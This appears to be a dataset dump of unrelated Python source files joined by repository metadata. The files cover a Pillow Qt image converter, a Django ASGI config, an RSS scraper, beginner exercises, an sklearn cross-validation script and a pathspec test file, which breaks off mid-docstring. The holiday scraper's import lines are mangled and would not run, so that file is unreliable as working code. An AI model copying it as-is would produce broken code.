    buffer = QBuffer()
    buffer.open(QIODevice.ReadWrite)
    # preserve alpha channel with png
    # otherwise ppm is more friendly with Image.open
    if im.hasAlphaChannel():
        im.save(buffer, 'png')
    else:
        im.save(buffer, 'ppm')

    b = BytesIO()
    try:
        b.write(buffer.data())
    except TypeError:
        # workaround for Python 2
        b.write(str(buffer.data()))
    buffer.close()
    b.seek(0)

    return Image.open(b)
def fromqpixmap(im):
    """Convert a Qt QPixmap into a PIL Image (delegates to fromqimage)."""
    return fromqimage(im)
    # buffer = QBuffer()
    # buffer.open(QIODevice.ReadWrite)
    # # im.save(buffer)
    # # What if png doesn't support some image features like animation?
    # im.save(buffer, 'ppm')
    # bytes_io = BytesIO()
    # bytes_io.write(buffer.data())
    # buffer.close()
    # bytes_io.seek(0)
    # return Image.open(bytes_io)
def align8to32(bytes, width, mode):
    """
    converts each scanline of data from 8 bit to 32 bit aligned
    """

    bits_per_pixel = {
        '1': 1,
        'L': 8,
        'P': 8,
    }[mode]

    # Scanline size in whole bytes, rounding a trailing partial byte up.
    bytes_per_line = (bits_per_pixel * width + 7) // 8
    # Zero bytes needed to reach the next multiple of four.
    extra_padding = -bytes_per_line % 4

    if not extra_padding:
        # Scanlines are already 32-bit aligned: return the buffer as-is.
        return bytes

    padding = b'\x00' * extra_padding
    line_count = len(bytes) // bytes_per_line
    return b''.join(
        bytes[i * bytes_per_line:(i + 1) * bytes_per_line] + padding
        for i in range(line_count)
    )
def _toqclass_helper(im):
    """(Internal) Resolve *im* (PIL image, path, or Qt string) into the
    raw data, QImage format and optional colortable needed to build a
    QImage."""
    data = None
    colortable = None

    # handle filename, if given instead of image name
    if hasattr(im, "toUtf8"):
        # FIXME - is this really the best way to do this?
        if py3:
            im = str(im.toUtf8(), "utf-8")
        else:
            im = unicode(im.toUtf8(), "utf-8")  # noqa: F821
    if isPath(im):
        im = Image.open(im)

    if im.mode == "1":
        format = QImage.Format_Mono
    elif im.mode == "L":
        # Greyscale: indexed 8-bit with an identity grey palette.
        format = QImage.Format_Indexed8
        colortable = []
        for i in range(256):
            colortable.append(rgb(i, i, i))
    elif im.mode == "P":
        # Palette image: translate the PIL palette (flat RGB triples).
        format = QImage.Format_Indexed8
        colortable = []
        palette = im.getpalette()
        for i in range(0, len(palette), 3):
            colortable.append(rgb(*palette[i:i+3]))
    elif im.mode == "RGB":
        data = im.tobytes("raw", "BGRX")
        format = QImage.Format_RGB32
    elif im.mode == "RGBA":
        try:
            data = im.tobytes("raw", "BGRA")
        except SystemError:
            # workaround for earlier versions
            r, g, b, a = im.split()
            im = Image.merge("RGBA", (b, g, r, a))
        format = QImage.Format_ARGB32
    else:
        raise ValueError("unsupported image mode %r" % im.mode)

    # Indexed modes still need their scanlines padded to 32-bit boundaries.
    __data = data or align8to32(im.tobytes(), im.size[0], im.mode)
    return {
        'data': __data, 'im': im, 'format': format, 'colortable': colortable
    }
if qt_is_installed:
    class ImageQt(QImage):
        """A PIL image wrapper exposed as a Qt QImage subclass."""

        def __init__(self, im):
            """
            An PIL image wrapper for Qt. This is a subclass of PyQt's QImage
            class.

            :param im: A PIL Image object, or a file name (given either as
            Python string or a PyQt string object).
            """
            im_data = _toqclass_helper(im)
            # must keep a reference, or Qt will crash!
            # All QImage constructors that take data operate on an existing
            # buffer, so this buffer has to hang on for the life of the image.
            # Fixes https://github.com/python-pillow/Pillow/issues/1370
            self.__data = im_data['data']
            QImage.__init__(self,
                            self.__data, im_data['im'].size[0],
                            im_data['im'].size[1], im_data['format'])
            if im_data['colortable']:
                self.setColorTable(im_data['colortable'])
def toqimage(im):
    """Wrap a PIL Image (or path) as an ImageQt/QImage instance."""
    return ImageQt(im)
def toqpixmap(im):
    """Convert a PIL Image into a Qt QPixmap (via an intermediate QImage)."""
    # # This doesn't work. For now using a dumb approach.
    # im_data = _toqclass_helper(im)
    # result = QPixmap(im_data['im'].size[0], im_data['im'].size[1])
    # result.loadFromData(im_data['data'])
    # Fix some strange bug that causes
    if im.mode == 'RGB':
        im = im.convert('RGBA')

    qimage = toqimage(im)
    return QPixmap.fromImage(qimage)
|
[
"[email protected]"
] | |
d41da186fe71beeba5d6a5db47eb2df882f9a820
|
44221bc0507955c1e62d256182291ac95514c4f6
|
/automatron_notify/__init__.py
|
e4ef215bc2aaa375436f09977691bf480f1315f1
|
[
"MIT"
] |
permissive
|
automatron/automatron-notify
|
8c14ee5d8025ebefc7e9b7788e5414230c269676
|
4dcacfb3a56a51a7d1a7521f2ab9f7a895493f1a
|
refs/heads/master
| 2021-01-17T14:31:31.323071 | 2014-03-25T08:18:46 | 2014-03-25T08:18:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 259 |
py
|
from automatron.core.event import IAutomatronEventHandler
class IAutomatronNotifyHandler(IAutomatronEventHandler):
    """Event-handler interface for notification events."""

    # NOTE(review): interface-style declaration -- the method deliberately
    # omits ``self``, presumably following the zope.interface convention
    # used by IAutomatronEventHandler; confirm before "fixing".
    def on_notify(server, username, title, body, body_as_html=None):
        """
        Called when a notification is triggered.
        """
|
[
"[email protected]"
] | |
321adce537d7842bc56ed5889f848d7433663330
|
4b8d6d0c057049beabdc7a516bd0653af94894a6
|
/DRF_nextjs/asgi.py
|
c3274d19c1591f6d6331af69cbe01c1a6e03c5b4
|
[] |
no_license
|
felipefoc/DRF-Next.Js
|
71a4d35cd2f69ffe84fb76b37a7094cc2950a71f
|
f8a904ec17d21e88590719ba98202d9fbcccf11e
|
refs/heads/main
| 2023-03-14T18:51:55.521287 | 2021-03-22T04:15:32 | 2021-03-22T04:15:32 | 350,203,864 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
ASGI config for DRF_nextjs project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os

from django.core.asgi import get_asgi_application

# Point Django at the project settings unless the environment already does.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DRF_nextjs.settings')

# Module-level ASGI callable picked up by the ASGI server.
application = get_asgi_application()
|
[
"[email protected]"
] | |
141c85f367df5664a2789b37bc7d83c97dc4a197
|
b5a29700c3516cf12f837e2284e3844546205d09
|
/plugins/vipread_generic_plugin.py
|
2771bd40386bf812df6f131de4bd2ab09fe0bf1a
|
[] |
no_license
|
p1g3/Collect-Info-Research
|
f609823486f36460186cfde27f4be7c9c5a058ae
|
e8e7366677a8642c3bcf4b103e43378762e6673c
|
refs/heads/master
| 2020-12-24T03:59:01.190032 | 2020-01-31T06:47:35 | 2020-01-31T06:47:35 | 237,374,792 | 37 | 12 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,913 |
py
|
import asyncio
import feedparser
import ssl
import pymongo
from loguru import logger
import datetime
from dateutil import parser
class vipread_generic_plugin:
    """Polls the vipread.com RSS feed and stores today's entries in MongoDB."""

    def __init__(self, loop, collection, lock):
        # The feed is fetched over HTTPS without certificate verification.
        ssl._create_default_https_context = ssl._create_unverified_context
        self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
        self.loop = loop
        self.rss = 'http://vipread.com/feed'
        self.collection = collection
        self.type = 'generic'
        self.lock = lock

    async def return_result(self):
        """Fetch and parse the feed off the event loop; insert links updated
        today that are not already stored (is_send=0 marks them unsent)."""
        logger.info("{} is running.", self.__class__.__name__)
        future = self.loop.run_in_executor(None, feedparser.parse, self.rss)
        try:
            parse_result = await asyncio.wait_for(future, 10, loop=self.loop)
        except:
            # Best-effort polling: any failure just skips this round.
            logger.warning("{} parse time out".format(self.rss))
            return
        # Fix: dict.has_key() was removed in Python 3; the `in` operator
        # works on feedparser's dict-like result as well.
        if 'entries' in parse_result:
            entries = parse_result['entries']
            format_time = datetime.date.today()
            for entrie in entries:
                article_time = parser.parse(entrie['updated'])
                # Keep only articles whose `updated` date is today.
                if (article_time.year == format_time.year) and (article_time.month == format_time.month) and (article_time.day == format_time.day):
                    add_dict = {'type': self.type, 'title': entrie['title'], 'link': entrie['link'], 'is_send': 0}
                    try:
                        # NOTE(review): `await lock` is the pre-3.10 idiom;
                        # modern asyncio expects `async with self.lock`.
                        await self.lock
                        # De-duplicate by link before inserting.
                        if self.collection.count_documents({'link': entrie['link']}) < 1:
                            self.collection.insert_one(add_dict)
                            logger.info('[Generic] {} {}'.format(entrie['title'], entrie['link']))
                    finally:
                        self.lock.release()
        else:
            logger.error('[Error Parse] {}', self.rss)
if __name__ == '__main__':
    # Manual smoke test: run one polling round against a local MongoDB.
    client = pymongo.MongoClient(host='localhost', port=27017)
    db = client.info_collect
    collection = db['infos']
    lock = asyncio.Lock()
    loop = asyncio.get_event_loop()
    class_name = vipread_generic_plugin(loop,collection,lock)
    loop.run_until_complete(class_name.return_result())
|
[
"[email protected]"
] | |
68c3277a9fe9cd3efe646288a0c0b687daeb5f40
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_continua.py
|
1d4f1175f6f6eee08a5947b834b37af45e65325d
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 230 |
py
|
#calss header
class _CONTINUA():
    """Word-form record for "CONTINUA" (inflected form of "continuum")."""

    def __init__(self,):
        self.name = "CONTINUA"
        # Fix: the base form was a bare undefined name (`continuum`), which
        # raised NameError on instantiation; store it as a list of strings,
        # mirroring `self.basic` below.
        self.definitions = ['continuum']
        self.parents = []
        # NOTE(review): "childen" looks like a typo for "children", but the
        # attribute name is part of the interface, so it is kept as-is.
        self.childen = []
        self.properties = []
        self.jsondata = {}

        self.basic = ['continuum']
|
[
"[email protected]"
] | |
26fc8b49fcc85ffb16820963727e86ecec723ae3
|
abccdbf9b0849b47960c3c352870793405debfed
|
/0x02-python-import_modules/3-infinite_add.py
|
319d74896baaa8ff2b1e4ae09a0a2729223fdf4b
|
[] |
no_license
|
hunterxx0/holbertonschool-higher_level_programming
|
88b1b0f31b536c6940f2e64a6924a06ba9cbf193
|
44064cf0722cd20d93f58b64ab185d2898770d73
|
refs/heads/master
| 2022-12-20T12:14:15.877147 | 2020-09-24T21:25:54 | 2020-09-24T21:25:54 | 259,276,369 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 290 |
py
|
#!/usr/bin/python3
if __name__ == "__main__":
    # Print the sum of all integer command-line arguments ("0" when none).
    from sys import argv
    x = len(argv)  # argv[0] is the script name itself
    if x == 2:
        # Single argument: echoed as-is.
        # NOTE(review): unlike the multi-argument branch this skips int(),
        # so a non-numeric single argument is printed verbatim -- confirm
        # that matches the task specification.
        print("{}".format(argv[1]))
    elif x == 1:
        print("0")
    else:
        s = 0
        for i in range(1, x):
            s += int(argv[i])
        print("{}".format(s))
|
[
"[email protected]"
] | |
3cad8bd54419850ca2db1e342c3d3452f6f847f5
|
3b4b188514c33a1f4568baa59a2a385a2d7b6205
|
/config/urls.py
|
b7d78a9010e1d399cb8c68101fcb8d15635d4acf
|
[] |
no_license
|
amyth/django-starter
|
5d74a7a5654611f966748523982d9d4591f1e43d
|
8a629cd717c038677488fd1860cc6001baf8c542
|
refs/heads/master
| 2020-05-17T17:32:46.993614 | 2014-09-24T07:15:17 | 2014-09-24T07:15:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 633 |
py
|
""" Main project url confuguration module. Other url modules
to be included in this module.
"""
from django.conf.urls import patterns, include, url
from django.contrib import admin

# Auto-register every app's admin.py with the admin site.
admin.autodiscover()

urlpatterns = patterns('',
    # Custom apps' urls
    url(r'^', include('candidates.urls')),
    url(r'^', include('recruiters.urls')),

    # Third party apps' urls
    url(r'^', include('social_auth.urls')),
    url(r'^api', include('rest_framework.urls', namespace='rest_framework')),

    # Admin urls
    url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    url(r'^admin/', include(admin.site.urls)),
)
|
[
"[email protected]"
] | |
087bc3914f01d56c5b118f5446be99dce12b524f
|
bd72c02af0bbd8e3fc0d0b131e3fb9a2aaa93e75
|
/Backtracking/restore_ip_addresses.py
|
9f2f7ded2404852ca3a967a2eb84096a1fa29da3
|
[] |
no_license
|
harvi7/Leetcode-Problems-Python
|
d3a5e8898aceb11abc4cae12e1da50061c1d352c
|
73adc00f6853e821592c68f5dddf0a823cce5d87
|
refs/heads/master
| 2023-05-11T09:03:03.181590 | 2023-04-29T22:03:41 | 2023-04-29T22:03:41 | 222,657,838 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 555 |
py
|
class Solution:
    def restoreIpAddresses(self, s: str) -> List[str]:
        """Return every valid dotted-quad IP address obtainable by
        splitting *s* into four segments.

        A segment is valid when it is a single digit, or a multi-digit
        run with no leading zero whose value is below 256.
        """
        results = []

        def backtrack(start, segments):
            # Stop once four segments exist or the string is exhausted;
            # record an address only when both happen at the same time.
            if len(segments) == 4 or start == len(s):
                if len(segments) == 4 and start == len(s):
                    results.append(".".join(segments))
                return
            upper = min(start + 3, len(s))
            for end in range(start + 1, upper + 1):
                segment = s[start:end]
                # One digit is always allowed; longer runs must not start
                # with '0' and must stay under 256.
                if end == start + 1 or (s[start] != "0" and int(segment) < 256):
                    backtrack(end, segments + [segment])

        backtrack(0, [])
        return results
|
[
"[email protected]"
] | |
6ae2af63c360ac6ce8e469d4ef399d5bd20040d2
|
6e4e6b64c035881f1cff39db616b0a80e1568c51
|
/JOI7Qual/q1.py
|
360741c86f3ad98b0fc70d4bc433923644dfa0f2
|
[] |
no_license
|
Lischero/Atcoder
|
f7471a85ee553e3ae791e3e5670468aea1fa53cc
|
f674d6a20a56eebdafa6d50d5d2d0f4030e5eace
|
refs/heads/master
| 2020-05-21T16:23:36.095929 | 2018-10-18T04:27:55 | 2018-10-18T04:27:55 | 60,671,810 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 205 |
py
|
# -*- coding:utf-8 -*-
# Pay 1000 yen for an item costing N; count the coins in the change
# using the greedy algorithm over standard yen denominations.
N = int(input())
change = 1000 - N

ans = 0
for factor in [500, 100, 50, 10, 5, 1]:
    # Integer division replaces the repeated-subtraction loop.
    ans += change // factor
    change %= factor
print(ans)
|
[
"[email protected]"
] | |
e2e6ae133a3c7d5e2a67478e807b2afbce460c4e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02921/s327676216.py
|
8d79966a0d9b41817f7a2c90ca060bbf016f3e46
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 625 |
py
|
# -*- coding: utf-8 -*-
## Library
import sys
# Fix: fractions.gcd was removed in Python 3.9 -- import it from math,
# where it has lived since Python 3.5.
from math import gcd
import math
from math import ceil,floor
import collections
from collections import Counter
import itertools
import copy
## input
# N=int(input())
# A,B,C,D=map(int, input().split())
# S = input()
# yoko = list(map(int, input().split()))
# tate = [int(input()) for _ in range(N)]
# N, M = map(int,input().split())
# P = [list(map(int,input().split())) for i in range(M)]
# S = []
# for _ in range(N):
#     S.append(list(input()))

# Count positions (out of the first three) where the two strings match.
S = input()
T = input()
ans = 0
for i in range(3):
    if S[i] == T[i]:
        ans += 1
print(ans)
|
[
"[email protected]"
] | |
8a1420991c7365f09dd23479368f9c23d3c181f4
|
485cf3c70fcaa68689a2b690b6465f1d6bcf21bd
|
/Python_Coding_Tips/Code_py/Code(实例源码及使用说明)/01/11/2.列表拼接的4种方法/demo04.py
|
9c2228030fefdd2ff56cc3049a75ad004b1c1f83
|
[] |
no_license
|
lxz0503/study_20190608
|
5ffe08c4704bb00ad8d1980baf16b8f5e7135ff4
|
47c37798140883b8d6dc21ec5da5bc7a20988ce9
|
refs/heads/master
| 2022-12-23T17:23:45.039015 | 2021-06-23T14:50:19 | 2021-06-23T14:50:19 | 190,884,812 | 1 | 3 | null | 2022-12-15T23:17:33 | 2019-06-08T12:22:56 |
Python
|
UTF-8
|
Python
| false | false | 1,015 |
py
|
# *_* coding : UTF-8 *_*
# 开发团队 :明日科技
# 开发人员 :Administrator
# 开发时间 :2019/7/1 15:32
# 文件名称 :demo04.py
# 开发工具 :PyCharm

# Car sales (brand, units) for Germany, France and England, by rank.
gem = [["大众",643518],["奔驰",319163],["宝马",265051],["福特",252323],["雪铁龙",227967],["奥迪",255300]]
fra = [["雪铁龙", 698985],["雷诺",547704],["大众",259268],["福特",82633],["宝马",84931],["奔驰",73254]]
eng = [["福特",254082],["大众",203150],["雪铁龙",177298],["奔驰",172238],["宝马",172048],["奥迪",143739]]

# Walk the three rankings in lockstep, one row per rank.
for item1, item2, item3 in zip(gem, fra, eng):
    print(item1[0], item1[1], " ", item2[0], item2[1], " ", item3[0], item3[1])

# Same table again, left-justified into 8-character columns.
for item1, item2, item3 in zip(gem, fra, eng):
    item11 = item1[0].ljust(8)
    item12 = str(item1[1]).ljust(8)
    item21 = item2[0].ljust(8)
    item22 = str(item2[1]).ljust(8)
    # Fix: the third column previously reused item1[0] (the German brand)
    # instead of item3[0], mispairing the English brand with its figure.
    item31 = item3[0].ljust(8)
    item32 = str(item3[1]).ljust(8)
    print(item11+"\t", item12+"\t", " ", item21+"\t", item22+"\t", " ", item31+"\t", item32)
|
[
"[email protected]"
] | |
c7c5b0151c352832384a07e85f6e49c5f966ec94
|
a0947c2778742aec26b1c0600ceca17df42326cd
|
/Python/PythonInADay2/CSV-Files-Drill/37of79-87.py
|
c6d72c705eb76b99aaf1d8f9ab163131ca821099
|
[] |
no_license
|
JohnCDunn/Course-Work-TTA
|
5758319d4607114914ba9723328658bed8fb2024
|
8c4f60d51007dac2ac4cceb84b0f9666e143c0d7
|
refs/heads/master
| 2021-01-10T16:37:02.609879 | 2016-02-01T18:05:38 | 2016-02-01T18:05:38 | 49,983,248 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 331 |
py
|
import wx
class Frame(wx.Frame):
    """Top-level 300x250 window holding a single SpinCtrl widget."""

    def __init__(self, title):
        # No parent window; fixed initial size.
        super().__init__(None, title=title, size=(300, 250))
        panel = wx.Panel(self)
        # Spinner starts at 0, placed at a fixed position on the panel.
        wx.SpinCtrl(panel, value='0', pos=(130, 50), size=(70, 25))


app = wx.App()
frame = Frame("wxPython Widgets!")
frame.Show()
app.MainLoop()
|
[
"[email protected]"
] | |
3cacda28f5023df250d156ab5a4eff4b61274f2e
|
dc77896138400114f6770310591fbfb02e36d3cd
|
/{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/common/utils.py
|
cf5bc6fc70109d2f501aa0fa00154039301d810c
|
[
"MIT"
] |
permissive
|
drgarcia1986/cookiecutter-muffin
|
97163a66a57d83dc802223ccbd5307bd1896429d
|
7aa861787b4280477a726da99cf9de4047b01d91
|
refs/heads/master
| 2021-01-01T16:34:08.043952 | 2015-08-27T22:19:35 | 2015-08-27T22:31:22 | 40,458,394 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 216 |
py
|
import muffin
from .. import app
@app.ps.jinja2.context_processor
def current_user_context():
    """Expose the request-local current user to every Jinja2 template."""
    request_locals = muffin.local(app.loop)
    return {'user': getattr(request_locals, 'current_user')}
|
[
"[email protected]"
] | |
7b7fd334b67b1727da4bdc482d2cdcaadfa4dab1
|
0403dcc7cdf0e8174300569969914e885ebc4a9b
|
/tests/test_scriptdata_longstring.py
|
e12af73e657048fee3f976929a27d7d4d20b3bfb
|
[
"BSD-2-Clause"
] |
permissive
|
chrippa/python-flashmedia
|
03ea9029ef51871872c87d26384bf8433d8b165c
|
f5df4987d6d6661a240756435bb8729f82d8d31f
|
refs/heads/master
| 2021-01-19T19:36:09.256165 | 2013-04-29T10:30:07 | 2013-04-29T10:30:07 | 5,651,549 | 15 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,799 |
py
|
# vim: set fileencoding=utf8 :
from __future__ import unicode_literals
from . import with_fd
from flashmedia.types import ScriptDataLongString
# Fixtures: each blob is a 4-byte big-endian length prefix followed by the
# encoded payload.
ASCII = b"\x00\x00\x00\x03ABC"
ASCII_SIZE = len(ASCII)

UTF8 = b"\x00\x00\x00\t\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa\x9e"
UTF8_SIZE = len(UTF8)

# Same UTF-8 text but truncated mid-codepoint (length says 8 bytes);
# decoding is expected to drop the incomplete trailing character.
BROKEN_UTF8 = b"\x00\x00\x00\x08\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa"
BROKEN_UTF8_SIZE = len(BROKEN_UTF8)


# --- pack: string -> length-prefixed blob ---

def test_pack_ascii():
    assert ScriptDataLongString("ABC", "ascii") == ASCII

def test_pack_utf8():
    assert ScriptDataLongString("日本語") == UTF8

def test_pack_into():
    # Two consecutive pack_into calls must fill the buffer back-to-back
    # and advance the offset by the total packed size.
    size = ASCII_SIZE + UTF8_SIZE
    buf = bytearray(size)
    offset = 0
    offset = ScriptDataLongString.pack_into(buf, offset, "ABC", "ascii")
    offset = ScriptDataLongString.pack_into(buf, offset, "日本語")

    assert buf == (ASCII + UTF8)
    assert offset == size


# --- size: predicted encoded size matches the fixture blobs ---

def test_size_ascii():
    assert ScriptDataLongString.size("ABC", "ascii") == ASCII_SIZE

def test_size_utf8():
    assert ScriptDataLongString.size("日本語") == UTF8_SIZE


# --- read: file-like decoding; the fd must end up positioned past the blob ---

@with_fd(ASCII)
def test_read_ascii(fd):
    assert ScriptDataLongString.read(fd, "ascii") == "ABC"
    assert fd.tell() == ASCII_SIZE

@with_fd(UTF8)
def test_read_utf8(fd):
    assert ScriptDataLongString.read(fd) == "日本語"
    assert fd.tell() == UTF8_SIZE

@with_fd(BROKEN_UTF8)
def test_read_broken_utf8(fd):
    # The truncated final codepoint is silently dropped.
    assert ScriptDataLongString.read(fd) == "日本"
    assert fd.tell() == BROKEN_UTF8_SIZE


def test_unpack_from():
    # Three blobs concatenated in one buffer; unpack_from must consume
    # them in order, threading the returned offset through each call.
    buf = ASCII + UTF8 + BROKEN_UTF8
    offset = 0

    val, offset = ScriptDataLongString.unpack_from(buf, offset)
    assert val == "ABC"

    val, offset = ScriptDataLongString.unpack_from(buf, offset)
    assert val == "日本語"

    val, offset = ScriptDataLongString.unpack_from(buf, offset)
    assert val == "日本"
|
[
"[email protected]"
] | |
3468f78680d2c6fa3b3616f9121f4dae00214184
|
ce55c319f5a78b69fefc63595d433864a2e531b5
|
/爬虫知识/爬虫/04day/04-爬取音乐.py
|
66b60b9b5ade7ecbd06ebc3bde5dd9fae6443f39
|
[] |
no_license
|
Suijng/1809_data
|
a072c875e8746190e3b715e53f1afe3323f4666b
|
45f8a57089f5c30ccc1a3cddb03b76dc95355417
|
refs/heads/master
| 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 |
HTML
|
UTF-8
|
Python
| false | false | 360 |
py
|
import urllib.request

# Route HTTP and HTTPS traffic through fixed upstream proxies.
proxy = {
    'http': '61.176.223.7:58822',
    'https': '119.102.132.60:31325'
}

proxy_handler = urllib.request.ProxyHandler(proxies=proxy)
opener = urllib.request.build_opener(proxy_handler)

# Fetch the proxy-list page through the opener and dump the decoded body.
page = opener.open(urllib.request.Request(url='http://www.xicidaili.com/'))
print(page.read().decode())
|
[
"[email protected]"
] | |
43a04e5ac41572106ab3ff879af6d0b36c7e0e92
|
c36679186f669c6e3bd1c106c96d4a17be1f5ab1
|
/Data Science and Mechine Leraning/99.py
|
a816c6cc8a35dc07365ddd5a9e3c00881cf640da
|
[] |
no_license
|
touhiduzzaman-tuhin/python-code-university-life
|
60a3d671b200a6f5222c6d176c13c5f20f013509
|
6d2e3d90d430faa5c83fe79e7fb1ebe516994762
|
refs/heads/master
| 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 183 |
py
|
import numpy as np
import pandas as pd

# Source columns: A and B contain missing entries (NaN), C is complete.
li = {'A': [1, 2, np.nan], 'B': [1, np.nan, np.nan], 'C': [1, 2, 3]}
li2 = pd.DataFrame(data=li)
# Replace every missing cell with a visible placeholder string.
li3 = li2.fillna('FILL VALUE')
print(li3)
|
[
"[email protected]"
] | |
ccbd6d4fef4e78de38c9276cc38f6fa7330b80d5
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/097_beautifulsoup_ii_scrape_us_holidays/save1_passed.py
|
23b546430bed3f5a69c3ef251e95a5ae2acb06fc
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 1,037 |
py
|
from collections import defaultdict
import os
from u__.r.. import u..
from bs4 import BeautifulSoup
# prep data
tmp = os.getenv("TMP", "/tmp")
page = 'us_holidays.html'
holidays_page = os.path.join(tmp, page)
u..(
f'https://bites-data.s3.us-east-2.amazonaws.com/{page}',
holidays_page
)
with open(holidays_page) as f:
content = f.read()
holidays = defaultdict(list)
def get_us_bank_holidays(content=content):
    """Parse the scraped holiday page and fill the module-level mapping.

    Receives the raw HTML, locates the bank-holiday table
    (css class = list-table) and returns a dict whose keys are
    two-digit month strings and whose values are lists of holiday names.
    """
    soup = BeautifulSoup(content, 'html.parser')
    table = soup.find('table', {'class': 'list-table'})

    # <time> cells carry ISO dates; characters 5:7 are the month digits.
    months = [cell.text[5:7] for cell in table.findAll('time')]
    # Anchor text holds the holiday name.
    names = [link.text.strip() for link in table.findAll('a')]

    for month, name in zip(months, names):
        holidays[month].append(name)
    return holidays
|
[
"[email protected]"
] | |
bb02dddbd6ef8c599eda31ca5a6d7365c3f4b787
|
636ba2700eaf3a151b73144b510f38c75ab1919d
|
/ml/m11_kfold_estimators2_cancer.py
|
83c224be41b0db487d18733b67d449cc86ebf928
|
[] |
no_license
|
Taerimmm/ML
|
17997f388e18c28dfd9de83af98a6d4bebe7e1f0
|
6147cede81ebcc95f21adebf75731fbbb11edfab
|
refs/heads/master
| 2023-06-10T14:26:45.335219 | 2021-07-05T15:30:47 | 2021-07-05T15:30:47 | 324,874,959 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,070 |
py
|
from sklearn.model_selection import train_test_split, KFold, cross_val_score
from sklearn.metrics import accuracy_score
from sklearn.utils import all_estimators
from sklearn.datasets import load_breast_cancer

import warnings
warnings.filterwarnings('ignore')

# Breast-cancer binary classification dataset (569 samples, 30 features).
dataset = load_breast_cancer()
x = dataset.data
y = dataset.target

x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)

kfold = KFold(n_splits=5, shuffle=True)

import sklearn
print(sklearn.__version__)    # 0.23.2
# all_estimators -> was tuned for sklearn 0.20.
allAlgorithms = all_estimators(type_filter='classifier')    # every classifier registered in sklearn
# print(allAlgorithms)

# Run 5-fold cross-validation over every registered classifier; estimators
# missing or broken in this sklearn version are reported and skipped.
for (name, algorithm) in allAlgorithms:
    try :
        model = algorithm()
        scores = cross_val_score(model, x_train, y_train, cv=kfold)   # cv=5 also works / in that case shuffle=False
        print(name, '의 정답율 :\n', scores)
    except :
        # continue
        print(name, '은 없는 놈')  # algorithm not usable in 0.23.2

# These per-model scores can serve as a baseline reference metric.
|
[
"[email protected]"
] | |
1ced1e5bd8b38f823f7c72e74c340613a4c11f63
|
a9c0daa4a7b9a4d7341afcab270c5b5debb8c13f
|
/env/lib/python3.6/site-packages/pathspec/tests/test_gitignore.py
|
af1ee7a82daa8a6f90fb940d7c15e127faf3eb7e
|
[] |
no_license
|
phamcong/alienator-plf
|
bad8c4e003fd189c43243b31ef2b975b6f154754
|
ea65628af66fbca51f2248ceb4ba93f858dbddce
|
refs/heads/master
| 2022-11-26T01:28:38.286261 | 2017-11-07T15:12:08 | 2017-11-07T15:12:08 | 109,412,097 | 0 | 1 | null | 2020-07-25T23:43:17 | 2017-11-03T15:30:22 |
JavaScript
|
UTF-8
|
Python
| false | false | 5,066 |
py
|
# encoding: utf-8
"""
This script tests ``GitIgnorePattern``.
"""
import unittest
import pathspec.util
from pathspec import GitIgnorePattern
class GitIgnoreTest(unittest.TestCase):
    """
    The ``GitIgnoreTest`` class tests the ``GitIgnorePattern``
    implementation.

    Each test feeds a single gitignore-style pattern to
    ``GitIgnorePattern`` and pins down two things: whether the pattern
    includes or excludes matches (``spec.include``) and the exact anchored
    regex it compiles to (``spec.regex.pattern``). Expected behavior is
    cross-checked against git check-ignore (v2.4.1) where noted.
    """

    def test_00_empty(self):
        """
        Tests an empty pattern.
        """
        spec = GitIgnorePattern('')
        # A null pattern matches nothing and compiles to no regex.
        self.assertIsNone(spec.include)
        self.assertIsNone(spec.regex)

    def test_01_absolute_root(self):
        """
